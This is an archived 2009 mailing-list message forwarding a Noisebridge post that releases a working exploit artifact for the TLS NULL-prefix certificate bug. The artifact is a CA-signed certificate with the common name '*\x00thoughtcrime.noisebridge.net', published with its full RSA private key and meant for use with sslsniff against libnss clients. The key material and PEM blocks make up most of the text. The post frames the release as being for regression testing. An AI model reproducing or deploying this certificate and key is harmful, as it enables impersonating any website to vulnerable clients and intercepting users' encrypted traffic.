Merry Certmas! CN=*\x00thoughtcrime.noisebridge.net

Jacob Appelbaum jacob at appelbaum.net
Tue Sep 29 22:51:33 PDT 2009


Hello *,

In the spirit of giving and sharing, I felt it would be nice to enable
other Noisebridgers (and friends of Noisebridge) to play around with
bugs in SSL/TLS.

Moxie was just over and we'd discussed releasing this certificate for
some time. He's already released a few certificates and I thought I'd
join him. In celebration of his visit to San Francisco, I wanted to
release fun-times-at-moxie-marlinspike-high. This is a text file that
contains a fully valid, signed certificate (with private key) that can
be used to exploit the NULL certificate prefix bug[0]. The certificate
is valid for * on the internet (when exploiting libnss software). The
certificate is good for two years. It won't work for exploiting the bug
for software written with the WIN32 api, they don't accept (for good
reason) *! I suggest the use of Moxie's sslsniff[1] if you're so
inclined to try network related testing. It may also be useful for
testing code signing software.

It's been long enough that everyone should be patched for this awesome
class of bugs. This certificate and corresponding private key should
help people test fairly obscure software or software they've written
themselves. I hope this release will help with confirmation of the bug
and with regression testing. Feel free to use this certificate for
anything relating to free software too. Consider it released into the
public domain of interesting integers.

Enjoy!

Best,
Jacob

[0] http://thoughtcrime.org/papers/null-prefix-attacks.pdf
[1] http://thoughtcrime.org/software/sslsniff/

Private-Key: (1024 bit)
modulus:
    00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
    5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
    c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
    6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
    72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
    29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
    bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
    93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
    ce:f0:82:33:d8:76:06:4c:9f
publicExponent: 65537 (0x10001)
privateExponent:
    00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff:
    3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09:
    6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc:
    51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11:
    c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76:
    06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a:
    35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2:
    28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c:
    57:2c:78:a9:42:b2:49:d8:71
prime1:
    00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4:
    0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce:
    2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84:
    96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4:
    e6:3a:40:99:03
prime2:
    00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b:
    17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93:
    e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba:
    c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23:
    49:79:53:35:35
exponent1:
    15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15:
    66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d:
    8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9:
    88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89:
    77:eb:0d:c1
exponent2:
    5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73:
    be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26:
    78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9:
    85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62:
    2d:92:6e:ed
coefficient:
    00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a:
    8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e:
    a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1:
    12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3:
    e6:c2:29:86:17
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
                    5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
                    c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
                    6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
                    72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
                    29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
                    bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
                    93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
                    ce:f0:82:33:d8:76:06:4c:9f
                Exponent: 65537 (0x10001)
        Attributes:
            a0:00
    Signature Algorithm: md5WithRSAEncryption
        64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30:
        c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4:
        a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14:
        0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1:
        d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de:
        70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9:
        f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20:
        a2:dc
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw
B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ
E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB
AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc
UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom
gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev
mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR
5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ
HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX
19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa
OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4
IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM
g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy
aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE
BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT
Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN
ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP
HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ
n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw
DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL
ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/
4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog
otw=
-----END CERTIFICATE REQUEST-----
-----BEGIN CERTIFICATE-----
MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw
MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD
VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91
Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ
82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H
Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC
Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG
A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2
TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG
A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh
bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2
ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w
LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv
MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy
L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3
dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG
CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl
bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p
cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww
ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw
MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz
Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr
BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
-----END CERTIFICATE-----





----- End forwarded message -----
-- 
Eugen* Leitl <a href="http://leitl.org">leitl</a> http://leitl.org
______________________________________________________________
ICBM: 48.07100, 11.36820 http://www.ativel.com http://postbiota.org
8B29F6BE: 099D 78BA 2FD3 B014 B08A  7779 75B0 2443 8B29 F6BE





More information about the cypherpunks-legacy mailing list